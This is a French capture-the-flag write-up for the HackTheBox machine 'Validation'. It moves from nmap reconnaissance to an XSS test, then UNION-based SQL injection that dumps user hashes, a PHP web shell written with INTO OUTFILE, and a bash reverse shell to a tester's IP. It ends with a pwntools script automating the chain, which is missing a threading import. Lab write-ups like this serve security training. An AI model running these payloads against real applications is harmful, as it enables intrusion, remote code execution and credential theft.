Validation HackTheBox (Writeup)

Skills:

XSS
SQLI (Error Based)
SQLI -> RCE (INTO OUTFILE)
Information Leakage

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap : Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap :

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.16 -oG allPorts

Analyse des ports ouverts avec extractport : Utilisation de la fonction extractport pour afficher de manière synthétique les ports ouverts et les copier dans le presse-papiers.

Scan de la version des ports avec Nmap : Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p80,22,8080 10.10.11.116 -oN targeted

Identification de la version de la machine avec WhatWeb :

Utilisation de WhatWeb pour scanner le site internet et identifier la version de la machine (Debian) et d'Apache :

Vulnérabilité XSS:

Une vulnérabilité XSS est identifiée :

<script>alert("xss")</script>

Vulnérabilité SQLi:

Ouverture de BurpSuite :

En tentant une injection SQL dans la variable "country", une erreur est générée :

&country=Brazil'

Étapes de l'injection SQL :

Afficher le nom de la base de données :

&country=Brazil' union select database()--

Afficher les noms de toutes les bases de données :

&country=Brazil' union select schema_name from information_schema.schemata-- -

Voir les tables de la base "registration" :

&country=Brazil' union select table_name from information_schema.tables where table_schema="registration"-- -

Voir les colonnes de la table "registration" :

&country=Brazil' union select column_name from information_schema.columns where table_schema="registration" and table_name="registration"-- -

Voir le contenu des colonnes :

&country=Brazil' union select group_concat(username,0x3a,userhash) from registration-- -

SQLI -> RCE (INTO OUTFILE)

Créer un fichier dans le répertoire "/var/www/html" :

&country=Brazil' union select "testing" into outfile "/var/www/html/test.txt"-- -

Tenter d'insérer un fichier PHP :

&country=Brazil' union select "<?php system($_REQUEST['cmd']); ?>" into outfile "/var/www/html/cmd.php"-- -

Capacité d'exécuter des commandes :

Exécuter un reverse shell :

bash -c "bash -i >%26 /dev/tcp/10.10.16.2/443 0>%261"

Mettre en écoute avec netcat.

Traitement de la terminal:

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Information Leakage:

Fichier "config.php" trouvé avec le mot de passe root.

Script Automatisation:

Voici un script en python qui automatise tout le processus :

from pwn import *
import signal, pdb, requests
import sys

def def_handler(sig, frame):
    print("\n\n[exiting]...\n")
    sys.exit(1) 

signal.signal(signal.SIGINT, def_handler)

if len(sys.argv) != 3:
    log.failure("uso: %s <ip-address> filename" % sys.argv[0]) 
    sys.exit(1)

ip_address = sys.argv[1]
filename = sys.argv[2]
main_url = "http://%s/" % ip_address
lport = 443 

def createFile():
    data_post = {
        'username': 'caa',
        'country': """Brazil' union select "<?php system($_REQUEST['cmd']); ?>" into outfile "/var/www/html/%s"-- - """ % (filename)
    }

    r = requests.post(main_url, data=data_post)

def getAccess():
    data_post = {
        'cmd': "bash -c 'bash -i >& /dev/tcp/10.10.14.76/443 0>&1'"
    }

    r = requests.post(main_url + "%s" % filename, data=data_post)

if __name__ == '__main__':
    createFile()
    try:
        threading.Thread(target=getAccess, args=()).start()
    except Exception as e:
        log.error(str(e))
    shell = listen(lport, timeout=20).wait_for_connection()
    shell.interactive()

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?